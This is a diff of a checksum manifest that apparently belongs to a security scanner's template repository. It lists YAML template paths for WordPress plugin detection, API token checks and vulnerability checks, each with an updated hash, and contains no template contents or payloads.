+http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da -http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:a7723a799166add94129a1779de11ed909657d7a -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:1762160b6b7a89bf948784c87d1b950dc9a7e7d3 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 -http/technologies/wordpress/plugins/woosidebars.yaml:638c27d3d171d1197b0ba0e47ed93d01cb8449be -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb -http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:fa61d1218c1699ca7cab047440aed1993e437f47 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 -http/technologies/wordpress-detect.yaml:fcd6c47e6ae72e3d87671b6cd0b892a0879adfec +http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 http/technologies/wuzhicms-detect.yaml:a2089ab6511154739a5b84c3bf5dae344faac492 @@ -5420,7 +5575,7 @@ http/token-spray/api-asana.yaml:f7b353f15cd42d77c009b18c189424f5d6479867 http/token-spray/api-bhagavadgita.yaml:96d03da9b404a1684988ce312e57e9a727280619 http/token-spray/api-bible.yaml:8843442941b013793781ef8a7587a6b515587a9c http/token-spray/api-binance.yaml:2ca046816c0ce5545d7ab1c6098e503b7db1930b -http/token-spray/api-binaryedge.yaml:d86ed81f573fbc654334980aca499c2edf9ba05d +http/token-spray/api-binaryedge.yaml:9fec538da7470ed75a681ba68b28b61db53a10ba http/token-spray/api-bingmaps.yaml:741deb3b4b4e35ddbeca2dacaa3ab5ae97d83c2b http/token-spray/api-bitcoinaverage.yaml:bc4875e75b7b132725c9106c29fd3e4d8939827f http/token-spray/api-bitly.yaml:404aabdc0c3a8bb340618c5a1b646a8276686614 @@ -5435,10 +5590,10 @@ http/token-spray/api-bravenewcoin.yaml:6058a8b40ac9a6e1c7cc6b4bb1f1789f100159d7 http/token-spray/api-browshot.yaml:1d4095baba4d0287c6e6544cc946d6d11a3b01da http/token-spray/api-buildkite.yaml:da69982ef9af57eedb1d9891bf5923d43b22d2a3 http/token-spray/api-buttercms.yaml:a935da32a038711ee576cd6421dc75aeb037e50d -http/token-spray/api-c99.yaml:5480893e5ede071923b89d070e5094ff77c8067f +http/token-spray/api-c99.yaml:a096d77e056cf1ed75d8d1c7239e4ec06054d54d http/token-spray/api-calendarific.yaml:fb26ac4ccd10991fee9a19c2ef12409e732e7380 http/token-spray/api-calendly.yaml:28162d2e2fcd44ba779c2bcde3607d5b2d2f5169 -http/token-spray/api-chaos.yaml:63d4199cc4dc897f8da1e3792fd5069c5920a8da +http/token-spray/api-chaos.yaml:75d88bc2dfe89834586d973d45f06ecd9cd83330 http/token-spray/api-charity.yaml:634982e3c37458daa8e1669c4e521ba197ccc19b http/token-spray/api-circleci.yaml:15d44915854af8d8f3337109786978c8a5c95ca4 http/token-spray/api-clearbit.yaml:7f61607b4f27e9c9943f4734d77929fb7df2bf65 @@ -5476,7 +5631,7 @@ http/token-spray/api-flowdash.yaml:f6a527e53f8928d91e7a6d87cc2f8e0c1885865f http/token-spray/api-fontawesome.yaml:40fddfbc225f5aeeb2c2ea5ed28ae548a22116c3 http/token-spray/api-fortitoken-cloud.yaml:04ee8f650ce1ce98866022166bc15165cf238846 http/token-spray/api-front.yaml:a4973c58bd54273f5f32471923f0f91193ac9e65 -http/token-spray/api-fullhunt.yaml:33a5d4fe222be697bf6b4e8c737d1188d9c17813 +http/token-spray/api-fullhunt.yaml:e927ea7f82a310f037aefa68a12fdbd246cd9640 http/token-spray/api-giphy.yaml:cbb5f77c89717d0974e67f8ca93120a012d4b48b http/token-spray/api-github.yaml:2544b179215b63ee5dcfd22beeb6f910d4fdbdac http/token-spray/api-gitlab.yaml:f20e5aa0058c1d5c831a2d865080c2aca78ebd80 @@ -5495,7 +5650,7 @@ http/token-spray/api-iconfinder.yaml:5ab4dfd0735ccfb18b786bf0a4c9f10f5443faa7 http/token-spray/api-improvmx.yaml:54739eb9df414820209d757795c7eebd43f7e171 http/token-spray/api-instagram.yaml:91a4aad9f9b229b3c913252d8242345e946b16a8 http/token-spray/api-instatus.yaml:42a24cbc3259caa25484a9989202c671bf181afb -http/token-spray/api-intelx.yaml:6b95e409bb0b3d202be89bc806f53df3423921a4 +http/token-spray/api-intelx.yaml:2a71a21b208e0b078960907a072401fce791514b http/token-spray/api-intercom.yaml:c9039e2e164cc7750752292b18c91895460a3a69 http/token-spray/api-ip2whois.yaml:5d64699d9224557373051bafd98a142295d68ff1 http/token-spray/api-ipdata.yaml:d3fb6e2e5426f42d61091c8147aaf6a2f6f24989 @@ -5527,7 +5682,7 @@ http/token-spray/api-myanimelist.yaml:656129445400d61ba0191d5cc9ae8b1ee9167dc7 http/token-spray/api-mywot.yaml:5fd7b7459e851d6461984c52984bcca8609240b8 http/token-spray/api-nerdgraph.yaml:eb7c825b7c1dfdea41f59a1f63e9283bb4b40c08 http/token-spray/api-netlify.yaml:8e0c907d30433722a2065ded3d68b293fd21e745 -http/token-spray/api-networksdb.yaml:b4c205ffc1f927d647c9da9cf1d1279f97ae319c +http/token-spray/api-networksdb.yaml:52bd66b85eb3afc506ee0028f193e6f076f64566 http/token-spray/api-newrelic.yaml:39270dabccfcd202f8c64ce051daa29851a43b72 http/token-spray/api-nownodes.yaml:ab9202c8d145453a5e64494c606e60cb9c89c58a http/token-spray/api-npm.yaml:11341dd47f3741abe55d3e840be0a9db8655b126 @@ -5563,18 +5718,18 @@ http/token-spray/api-scrapestack.yaml:7f1459d28e47c849ad42e29dc9cdd6f776899f07 http/token-spray/api-scrapingant.yaml:a9ea6e0b0fe74cddb1ab4e3eac18dc7d345c3b44 http/token-spray/api-scrapingdog.yaml:64e6b8b8886e12fe599a099b12be115c4dc6c278 http/token-spray/api-screenshotapi.yaml:118f90e9572e3e80e7b690fef85fbc8db331df66 -http/token-spray/api-securitytrails.yaml:a58e728e85e3b0af81ff6e826b31399a5b06c171 +http/token-spray/api-securitytrails.yaml:3977576744537c379d804fba24471a510d3b3166 http/token-spray/api-segment.yaml:0c2be5e91f612713ea38b3f9192ec417eaeb67b0 http/token-spray/api-sendgrid.yaml:3ee5cbec91c0b1572bfd8e32f4bd25437cf3a534 http/token-spray/api-sentry.yaml:529c24eb73d528f2c53485f82d83d308b3d1d3e2 http/token-spray/api-serpstack.yaml:97d670fdd9456d7b9f5b76949498fc3e6beada08 -http/token-spray/api-shodan.yaml:323e1d67eb6158e52723513409306badb786949f +http/token-spray/api-shodan.yaml:7c1d597de6c878e422c7eeb94b5156837b896dd2 http/token-spray/api-slack.yaml:6b316421f33b01cf122cfe4e9c61d2ddfaae67fe http/token-spray/api-smartsheet.yaml:5276be702d52e18e0ce00f5e0f1f41e03ff0dfbb http/token-spray/api-sonarcloud.yaml:2250180a45416972fcae3a4f83f1f9ec6438c30a http/token-spray/api-spotify.yaml:fee9dbf25b4ec78dfa67d79b57412bf8ba1d1214 http/token-spray/api-square.yaml:986ab0574f760537e80034fc9f0662b588fc21ff -http/token-spray/api-sslmate.yaml:81dbcb9d52bf8ba6bc98a06172ab24e4fc9e4f6e +http/token-spray/api-sslmate.yaml:7bb3c624fcb7e662dce0e9cb9664e78864c66cfc http/token-spray/api-strava.yaml:073390d677ce53b5a6ed30fc27059c049b62d661 http/token-spray/api-stripe.yaml:60d5f743cf79f953c46f42fe82de2b85a83a297d http/token-spray/api-stytch.yaml:a639f295efc3ac50a75a73b7679bd37c0232df63 @@ -5604,7 +5759,7 @@ http/token-spray/api-wordnik.yaml:14787038c709a7a7959df63783759d59c15ae010 http/token-spray/api-youtube.yaml:e9333edd55c1bc60a42c1f4acefeb705de9a481e http/token-spray/api-zenrows.yaml:c35489a1987ea7205abf4d6636cd40bd35b191bf http/token-spray/api-zerbounce.yaml:c620468c4a27ea523e6f71a83e20323f55ee3173 -http/token-spray/api-zoomeye.yaml:ba1e18a3f2f6d0b65c6293e97eb0d46c2433f84d +http/token-spray/api-zoomeye.yaml:83af74c9afca9f3ae71b3ac93788e073cc6556b2 http/token-spray/google-autocomplete.yaml:0396c0c5abce27df54d2cb16c834895285facb9a http/token-spray/google-books.yaml:d694fd85ab5e46f1b0169d661face2a49ba658a4 http/token-spray/google-customsearch.yaml:24adaddf7e4fa4e2c35862c4bfd294abd5e1cfde @@ -5630,22 +5785,22 @@ http/token-spray/google-streetview.yaml:f9355691478c4539a2a7d9d36b905c1b18552ac6 http/token-spray/google-timezone.yaml:cca63d4d4bbdda1323d847bdc439b422c7c3f48d http/token-spray/googlet-extsearchplaces.yaml:251a88a71f99e2cfc6458796474815aa4868c6c5 http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml:34a7ec43771dc6c47156dd140e6996fe06fd97d8 -http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml:21594f0187a61b151ffaca81bbc91689e1bf0b83 +http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml:3b540fa71bb5f1285e53a2839da091c67d507ec9 http/vulnerabilities/apache/apache-flink-unauth-rce.yaml:4711ebfd929286482d2d30c7abc70d0f68f9c866 http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml:a9597dde42dfbb2ddd3680f7ec3e7c477d57dca6 http/vulnerabilities/apache/apache-solr-file-read.yaml:d2c47f028f2e13278bb146309477dca17ffeaf48 -http/vulnerabilities/apache/apache-solr-log4j-rce.yaml:6ed216523a803a0f7b2e9c1f9d2703bc21b3a05e -http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml:092365a6f5efb65c76265681af599da6a7b7405b -http/vulnerabilities/avaya/avaya-aura-rce.yaml:6061ef2262a561e8c4deed8b24551ab6b1ff6d87 -http/vulnerabilities/avaya/avaya-aura-xss.yaml:a3989ef2665630ecb1367e027f08fe38efb484fe -http/vulnerabilities/avtech/avtech-auth-bypass.yaml:43aa455a1ec519b76d0e3277ada371e4ae1b2c4a -http/vulnerabilities/avtech/avtech-dvr-ssrf.yaml:344003e992642baf1d3c0f84bfc328aaf3539d50 -http/vulnerabilities/avtech/avtech-unauth-file-download.yaml:26cee6c9a673c58da4fe8f757733d8ce8690170d -http/vulnerabilities/avtech/avtech-verification-bypass.yaml:7a68af2273ab1dbf379933930ca70f176911ff7a +http/vulnerabilities/apache/apache-solr-log4j-rce.yaml:dd513584736bcbb882c43c42bdd7e8e76a75f335 +http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml:98b2f9e6cc4e14ce3761f624b11e7281c24cf93c +http/vulnerabilities/avaya/avaya-aura-rce.yaml:466178ea56b8d3903a543b36ba0003e6b2fb3019 +http/vulnerabilities/avaya/avaya-aura-xss.yaml:6f8c48fcfd4df00eb72f5b06de45c783b2730ad0 +http/vulnerabilities/avtech/avtech-auth-bypass.yaml:c5ba6599c40cb26dea65065261d072e6f5083373 +http/vulnerabilities/avtech/avtech-dvr-ssrf.yaml:d2c2b49be9bad9fd0753c090a86c4aa18e73e76a +http/vulnerabilities/avtech/avtech-unauth-file-download.yaml:15e280ee1d7344056e946fd7f25420ab1346992f +http/vulnerabilities/avtech/avtech-verification-bypass.yaml:9497012b89ada0ee6f48be0af32ef2033ec8a47a http/vulnerabilities/backdoor/jexboss-backdoor.yaml:cb6423774f8f65d84e48cea074a8b4bca7efdafb http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml:33ea1c079427978a64a5ed9817e0f957d051158a -http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:590598f1d9271f03c499b1e6694c3b9413783ed7 -http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:9e8d712c789e92189b0ddc34d538056ab62b7c40 +http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:46a8938a942cc80f2270acfce933e2051ee32628 +http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:5b6db3965a6cf77e625dc635f7a90cc8a6dd52af http/vulnerabilities/cisco/cucm-username-enumeration.yaml:243ce2fe32405c9d5cbd69e97d0d076aa9b7e380 http/vulnerabilities/code42/code42-log4j-rce.yaml:e18ed0b0f26d60457a78a831dee032ec17674d46 http/vulnerabilities/concrete/concrete-xss.yaml:2343d3ad37bc9c86d713e2204e3fc1dcdcbee407 @@ -5669,38 +5824,39 @@ http/vulnerabilities/froxlor-xss.yaml:171cad2e2fe82686b5743a0bca4904df72829d6f http/vulnerabilities/generic/basic-xss-prober.yaml:b23c58960ae10786fe30793d839fd2136dd782cf http/vulnerabilities/generic/cache-poisoning-xss.yaml:f53bd412c10617620c976f43cd79c664586a5dff http/vulnerabilities/generic/cache-poisoning.yaml:8ab72b5fe3a9a325dac673696087b3186c47c7f0 -http/vulnerabilities/generic/cors-misconfig.yaml:dbda704ee59b0bcf6f40ddb8ccd4d52f5886c4de +http/vulnerabilities/generic/cors-misconfig.yaml:9c75ee983504ba89c7a853a2aea3241bb0883fa2 http/vulnerabilities/generic/crlf-injection.yaml:66861070039fe1e4532471506cb10bd2820dfbef http/vulnerabilities/generic/error-based-sql-injection.yaml:eec4a6a263a6e98ea0fd63f940e6995539857f4b http/vulnerabilities/generic/generic-blind-xxe.yaml:3afef8ea3750f7306a3f105162c4aafabebf2b0a -http/vulnerabilities/generic/generic-env.yaml:ef0b99dd551cea82102abd2968840885077ef7c6 +http/vulnerabilities/generic/generic-env.yaml:195707d7a49267eff487be2c2cb4cdb9ed31837c http/vulnerabilities/generic/generic-j2ee-lfi.yaml:4aa1ebd50f29a6405fa5916566a0e65b57f56545 http/vulnerabilities/generic/generic-linux-lfi.yaml:c14980bc549266362db014e84202c5d019fdc357 http/vulnerabilities/generic/generic-windows-lfi.yaml:f484e6f1cde05b4623273fbc0b0196c41e69eaba http/vulnerabilities/generic/host-header-injection.yaml:005be392a7e5b1e8dd7158ca957633b396f00d24 http/vulnerabilities/generic/oob-header-based-interaction.yaml:a1d5a147b07e4d1d34d43af037412d427129c1e0 http/vulnerabilities/generic/oob-param-based-interaction.yaml:e88860f680f67acece0889e7de070b7eb0c4c929 -http/vulnerabilities/generic/open-redirect.yaml:36a056caa679d933d2016bd10de39d45988b9706 +http/vulnerabilities/generic/open-redirect.yaml:53f2e9495bebd7dd4c7db9709b71611dbca1bab3 http/vulnerabilities/generic/request-based-interaction.yaml:02dae1efe4447fab069f106aa788cef5687f2484 http/vulnerabilities/generic/top-xss-params.yaml:2f7423bc49090d9f33fde1490fd2824f6ae3d191 http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml:e16b3f696f9217799fd1c047426b557e2bbc95a6 -http/vulnerabilities/gitea/gitea-rce.yaml:3a99052da26f80659f93f36416734038c9fdfc31 +http/vulnerabilities/gitea/gitea-rce.yaml:c09d1af49db01f834a41014a58fc6f2831a6607b http/vulnerabilities/gitlab/gitlab-rce.yaml:69ac27dc10ee5a98b5011241b312d4554fa84882 